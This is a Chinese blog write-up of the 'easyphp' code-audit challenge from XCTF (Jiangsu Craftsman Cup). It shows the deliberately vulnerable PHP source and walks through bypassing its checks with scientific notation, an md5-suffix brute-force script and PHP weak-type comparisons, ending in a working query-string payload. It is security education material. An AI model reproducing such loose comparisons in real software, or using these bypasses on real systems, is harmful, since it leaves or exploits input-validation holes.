江苏工匠杯 easyphp

Andromeda

发布于 2023-10-21 11:19:40

2350

发布于 2023-10-21 11:19:40

文章被收录于专栏：Andromeda的专栏

一道代码审计题，记录一下绕过的方法。题目来源于XCTF。

题目概览

一进来就是一段PHP。

<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;

$a = $_GET['a'];
$b = $_GET['b'];

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
   if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
       $key1 = 1;
      }else{
           die("Emmm...再想想");
      }
  }else{
   die("Emmm...");
}

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
   if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
       $d = array_search("DGGJ", $c["n"]);
       $d === false?die("no..."):NULL;
       foreach($c["n"] as $key=>$val){
           $val==="DGGJ"?die("no......"):NULL;
      }
       $key2 = 1;
  }else{
       die("no hack");
  }
}else{
   die("no");
}

if($key1 && $key2){
   include "Hgfks.php";
   echo "You're right"."\n";
}

?>

分析一下代码吧。GET传三个参数a、b、c，满足一系列条件让key1=1 &&

参数a

a只有这一小段戏码。intval(a)将a转化成整数然后要满足大于6000000同时长度小于等于3。怎么办？可以想到使用科学计数法。

所以a=6e7。

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3)

参数b

if(isset($b) && '8b184b' === substr(md5($b),-6,6))

这段代码截取$b经过md5加密后的最后六位字符，需要满足=== '8b184b'。所以要找一个数字或字符串，经过md5加密后最后六位为8b184b。

跑个代码就得到了，得到结果为53724。

import hashlib
for i in range(0, 100000):
   hl=hashlib.md5()
   s = str(i)
   hl.update(s.encode(encoding='utf8'))
   md5=hl.hexdigest()
   if str(md5)[-6:] == "8b184b":
       print(s + ":" +  str(md5))
       break

所以b=53724。

a和b解决之后就可以让$key1=1了。

参数c

这一个参数应该是最难的，反正我是搞了很久。

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
   if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
       $d = array_search("DGGJ", $c["n"]);
       $d === false?die("no..."):NULL;
       foreach($c["n"] as $key=>$val){
           $val==="DGGJ"?die("no......"):NULL;
      }
       $key2 = 1;
  }else{
       die("no hack");
  }
}else{
   die("no");
}

第一行可知，传入的c应该是一个JSON格式的字符串，然后解析成数组。

首先判断@c["m"]是否为数字，如果是就寄了。还需要满足

if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022)

又是弱类型比较，第一部分这样就可以了。

{
   "m":"2023a",
}

@c["n"]为含两个元素的数组，且

if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0]))

所以继续补充如下。

{
"m":"2023a",
"n": [
[1, 2, 3],
[4, 5, 6]
]
}

最后一部分了。

$d = array_search("DGGJ", $c["n"]);
$d === false?die("no..."):NULL;
foreach($c["n"] as $key=>$val){
$val==="DGGJ"?die("no......"):NULL;
}

d = array_search("DGGJ", d = = = false?die("no..."):NULL;这两句，在数组

{
"m":"2023a",
"n": [
[1, 2, 3],
"DGGJ"
]
}

这段代码遍历$c["n"]数组中的值，如果出现了DGGJ则退出进程。得想点办法绕过去。

foreach($c["n"] as $key=>$val){
$val==="DGGJ"?die("no......"):NULL;
}

还是回到array_search()这个函数，把c中的DGGJ换成0即可。

这里的array_search()没有设置strict参数（如果该参数被设置为 TRUE，则函数在数组中搜索数据类型和值都一致的元素），我们就可以用0和DGGJ进行弱比较，0 == 'DGGJ'。

这样最后的c就整出来了。

{
   "m":"2023a",
   "n": [
      [1, 2, 3],
       0
  ]
}

拿下flag

所以最后payload为：

?a=6e7&b=53724&c={"m":"2023a","n":[[1,2,3],0]}

#url编码
?a=6e7&b=53724&c=%7B%22m%22%3A%222023a%22%2C%22n%22%3A%5B%5B1%2C2%2C3%5D%2C0%5D%7D

拿下flag

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

如有侵权请联系 cloudcommunity@tencent.com 删除

函数

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度